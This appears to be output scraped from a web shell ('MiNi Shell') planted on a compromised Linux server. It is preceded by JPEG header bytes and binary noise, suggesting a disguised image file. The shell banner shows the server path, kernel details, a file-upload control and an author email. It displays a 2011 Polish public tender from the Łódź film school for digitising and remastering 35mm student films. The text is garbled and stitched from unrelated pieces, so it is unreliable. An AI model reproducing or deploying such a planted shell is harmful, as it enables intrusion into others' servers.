JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111212/327913-N-2011.html

<p class="kh_header"><b>Łódź: Transfer z taśmy 35mm do plików DPX 2K, digitalizacja, remastering i korekcja barwna obrazu oraz digitalizacja i remastering dzwięku</b><br>
<b>Numer ogłoszenia: 327913 - 2011; data zamieszczenia: 12.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Filmowa, Telewizyjna i Teatralna im. L. Schillera w Łodzi , ul. Targowa 61/63, 90-323 Łódź, woj. łódzkie, tel. 042 6345800, faks 042 674 81 39.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Transfer z taśmy 35mm do plików DPX 2K, digitalizacja, remastering i korekcja barwna obrazu oraz digitalizacja i remastering dzwięku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się 1 części (zadania). W ramach zadania zamawiający przeznacza następujące filmy do transferu i korekcji z taśmy 35mm na nośniki cyfrowe (czas łączny transferu 294): 
Agnieszka Osiecka:
Czarne i białe7
Solo na kontrabasie 5
Słoń 7
STS 58 9
Bar Listopad 11
Zwierzęta futerkowe 6
Plakat z drewna 4
 Grzegorz Królikiewicz
Wyjście 4
Każdemu to, czego mu wcale nie trzeba 12
 Wojciech Marczewski
Jak w niebie 5
Most nad torami4
Długie cienie 12
 Marcel Łoziński
Absolutorium 20
 Piotr Szulkin
Wszystko 7
Szkic do sześciu części 14
 Filip Bajon
Przyczynek do teorii językoznawstwa 8
 Robert Gliński
Siły na zamiary4
Pies 21
 Jan Jakub Kolski
Inauguracja 82 7
Umieranko10
 Dorota Kędzierzawska
Agnieszka 7
Jajko 10
Początek 6
Gucia16
Cameraimage nagrody - Kijanki 01 - czas łączny 78 minut
Wątroba i ziemniaki - Marek Wiser - złata kijanak 1997
Sfera - Mikołaj Lebkowski - srebrna kijanka 1998
Claire - Bogumił Godfrejow - Złotk Kijanka 1999
Q - Piotr Szczepański - Srebrna Kijanka 1999
Kręgi Snu - Bogumił Godfrejow - Złota Kijanka 2000
Wrzask - Screem - Srebrna Kijanka 2000
Kimeria - Sławomir Bergański - Złota Kijanka 2001

Formaty plików wyjściowych w przypadku digitalizacji materiału audiowizualnego:
	Taśma filmowa 35 i 16 mm:
1.	Sekwencja plików w formacie DPX wraz z odpowiadającym jej plikiem dźwiękowym w formacie nieskompresowanym PCM 24bit, 96kHz w kontenerze WAV;
2.	Plik w formacie JPEG2000 (skompresowany bezstratnie) w kontenerze QuickTime;
3.	Plik w formacie Pro Res 422 w kontenerze QuickTime;
4.	Plik w formacie MPEG 2.

Zdigitalizowane materiały audio-wideo powinny zostać zapisane w formatach wskazanych w w/w formatach na dyskach zewnętrznych WesternDigital My Book Studio 6TB, wyposażonych w złącza eSATA USB 2.0 oraz FireWire oraz równolegle na taśmach LTO 5 (archiwizacja). Całość zadania powinna zostać zapisana na dwóch kompletach (tj 2x na HDD i 2 X na LTO)


Przedmiot zamówienia polega w szczególności na (dotyczy wszystkich wymienionych zadań): DIGITALIZACJI, REMASTERINGU I KOREKCJI BARWNEJ OBRAZU ORAZ DIGITALIZACJI I REMASTERINGU DŹWIĘKU SPEŁNIAJĄCYCH PONIŻSZE WARUNKI:

Parametry techniczne transferu i korekcji:
Obraz powinien być skanowany w rozdzielczości 2K do formatu DPX. z geometrią 4:3, tzw. usługa skan. Celem zamówienia jest wytworzenie cyfrowej kopii wzorcowej pełniącej rolę cyfrowej kopii zabezpieczającej (archiwalnej) i cyfrowej kopii wzorcowej będącej źródłem dla wytwarzania wersji w formatach dystrybucyjnych. Podstawowym zadaniem procesu skanowania jest wierne przeniesienie charakterystycznych cech obrazu zarejestrowanego na materiale światłoczułym. Materiał posłuży następnie do finalnej korekcji gęstościowej - dla nadania cyfrowej kopii archiwalnej wartości estetycznych właściwej dla miana kopii wzorcowej. Etap ten będzie wymagał opieki artystycznej i nadzoru przedstawiciela Zamawiającego.

Wymagane maszyny do procesu digitalizacji.
Ze względu na bardzo dużą wartość kulturową materiału przekazywanego Wykonawcy do digitalizacji, podczas procesu digitalizacji musi być zastosowane urządzenie fabryczne przeznaczone do pracy z materiałem filmowym (negatywowym, duppozytywowym, pozytywowym, czarno-białym i kolorowym), który nie powoduje degradacji mechanicznej i termicznej materiału filmowego.

Stan techniczny materiałów filmowych przed i po digitalizacji. 
Materiał filmowy dostarczony będzie wraz z metryką stanu technicznego, sporządzoną przez Zamawiającego. Wymagany jest wpis kontroli technicznej Wykonawcy przed przystąpieniem do pracy i po jej skończeniu. Wpis ten dotyczy stanu: emulsji, podłoża, perforacji oraz wszelkich nieprawidłowości występujących na materiale, a które mają wpływ na jakość obrabianego obrazu.

Pomoc techniczna i logistyczna  nad procesem digitalizacji, remasteringu i korekcji gęstościowej
Podczas opisu i korekcji barwnej wymagana jest obecność i współpraca kolorysty z dużym doświadczeniem zawodowym (udokumentowane minimum 3 lata pracy jako starszy kolorysta), którego zapewni Wykonawca. Wykonawca będzie miał obowiązek dopuścić do nadzoru nad wykonaniem przedmiotu zamówienia osoby wskazane przez  Zamawiającego. 

Downscaling materiału filmowego z 2K do rozdzielczości HDTV . 
Do procesu tzw. Downscalingu, Wykonawca użyje profesjonalnego sprzętu i oprogramowania posługującego się algorytmem niedegradującym obrazu. Skalowanie obrazu z rozdzielczości 2K do HDTV musi być wykonane z użyciem algorytmu nie gorszego niż Bicubic.

Nośniki danych i zapis.
Materiał filmowy po digitalizacji powinien zostać zapisany na wskazanych w opisie przedmiotu zamówienia nośnikach. Koszt nośników, zapisu i exportu danych jest składnikiem ceny ryczałtowej. Wykonawca jest zobowiązany zapewnić wszystkie wymagane nośniki.

Specyfikacja nazewnictwa plików: 
Podział na foldery wg aktów (roli): reel1, reel2 itd. 
Nazwa pliku: TytulFilmu_reel1_00001.dpx, TytulFilmu_reel1_00002.dpx, itd. 
Dźwięk: podzielony na role i przypisany do kanału dźwiękowego (L,R) i roli, 
Nazwa pliku: Tytulfilmu_reel1_right.wav, itd.

Szczegółowy opis poszczególnych części zamówienia (zadań):
Usługa dotyczy: 
1.	Przeniesienie obrazu z taśmy światłoczułej 35mm na podłożu bezpiecznym (aceto) do plików DPX, 10 bit LOG o rozdzielczości 2K,
2.	Zapisanie na nośnikach - materiał przed korekcją barwną plików DPX 10 bit LOG na nośniku (dyski zewnętrzne),
3.	Digitalizacja i remastering dźwięku (RR) do pliku wave 24bit 48 lub 96 kHz podzielony na rolki dopasowany do obrazu (Prędkość dźwięku 24 klatki na sekundę),
4.	Zapis w formatach plików JPEG2000 (skompresowany bezstratnie) w kontenerze QuickTime;
5.	Remastering obrazu w rozdzielczości 2K DPX 10 bit LOG,
6.	Finalna korekcja barwna i gęstościowa,
7.	Zapis po remasteringu i korekcji na nośniku HDCAM SR oraz plik QuickTime ProRes 422HQ w rozdzielczości 1920x1080,
8.	Stworzenie po korekcji barwnej i rekonstrukcji pakietu do kina cyfrowego DCP w postaci niezaszyfrowanej,
9.	Archiwizacja skanów źródłowych, materiałów po korekcji barwnej i rekonstrukcji oraz pakietu DCP na kasetach LTO5

Ad.1 Digitalizacja obrazu.
Obraz powinien być skanowany w rozdzielczości 2K do formatu DPX, 10 bit LOG. Zadaniem procesu skanowania jest wierne przeniesienie charakterystycznych cech obrazu zarejestrowanego na materiale światłoczułym. 
Ad. 3 Digitalizacja i remastering dźwięku.
Oczekiwany zakres korekcji dźwięku: korekcja szumów i barwy dźwięku. Kontrola ścieżki w zakresie poziomów - korekcja anomalii i zniekształceń powstałych w wyniku uszkodzeń mechanicznych ścieżki optycznej, kontrola ścieżki w zakresie wartości poziomów i powrót do właściwej wysokości dźwięku. Synchronizacja z obrazem. 
Ad. 4 Rekonstrukcja cyfrowa uszkodzeń obrazu.  
Zrekonstruowane filmy powinny spełniać wymogi techniczne dla materiałów audiowizualnych do projekcji w kinie emisji w TV (w zakresie uszkodzeń i jakości obrazu). Proces remasteringu będzie przebiegał wg wskazówek ekspertów technicznych i archiwistów Zamawiającego. Korekcja obrazu powinna odbyć się z należytą starannością by nie doprowadzić do powstania cyfrowych artefaktów i innych zniekształceń negatywnie wpływających na estetykę filmu. 
Rekonstrukcja obrazu powinna dotyczyć: 
1.	Stabilizacji obrazu,
2.	Usunięcia zadeszczeń i stałych rys,
3.	Usunięcia zaśnieżań,
4.	Usunięcia zniekształceń i plam w obrębie sklejek.

Ad. 5 Ostateczna korekcja gęstościowa.
Po etapie rekonstrukcji powinna zostać wykonana finalna korekcja gęstości. Ostatni etap 
nadania Cyfrowej Kopii archiwalnej wartości estetycznych właściwej dla miana kopii 
wzorcowej.

Ad.2 i 6 Nośniki danych i wymagane formaty eksportu.
a.	Dyski zewnętrzne, nowe z gwarancją producenta na co najmniej trzy lata, o pojemności minimalnej 1TB,
b.	DPX 10 bit LOG 2K, 
c.	Dźwięk WAV 24bit 48 lub 96 kHz podzielony na role dopasowany do obrazu (Prędkość dźwięku 24 klatki na sekundę), 
d.	Pliki poglądowe QuickTime ProRes 422 HQ w rozdzielczości 1920x1080,
e.	Pakiet do kina cyfrowego DCP w rozdzielczości 2K w formacie obrazu zgodnym z formatem obrazu filmu (FLAT lub SCOPE); DCP nie może być szyfrowane (bez kluczy KDM),
f.	Taśmy LTO5..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w   wysokości do 20% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.10.00.00-2, 92.11.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - należycie zrealizowali rekonstrukcję cyfrową obrazu (gdzie jedną z usług była digitalizacja) do 10 godzin materiału w 2K, w tym pięciu filmów pełnometrażowych, które miały premierę i były publicznie prezentowane w Polsce.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  posiadają urządzenie fabryczne ARRI Scan z modułem do skanowania w podczerwieni DigitalIce wraz z ramką skanującą w trybie archiwalnym,
Posiadają możliwości korekcji barwnej i gęstościowej na profesjonalnym, skalibrowanym projektorze 2K.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, iż są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.filmschool.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Filmowa Telewizyjna i Teatralna im. L.Schillera
ul. Targowa 61/63, 90-323 Łódź Sekretariat Kanclerza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2011 godzina 09:00, miejsce: Państwowa Wyższa Szkoła Filmowa Telewizyjna i Teatralna im. L.Schillera
ul. Targowa 61/63, 90-323 Łódź Sekretariat Kanclerza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com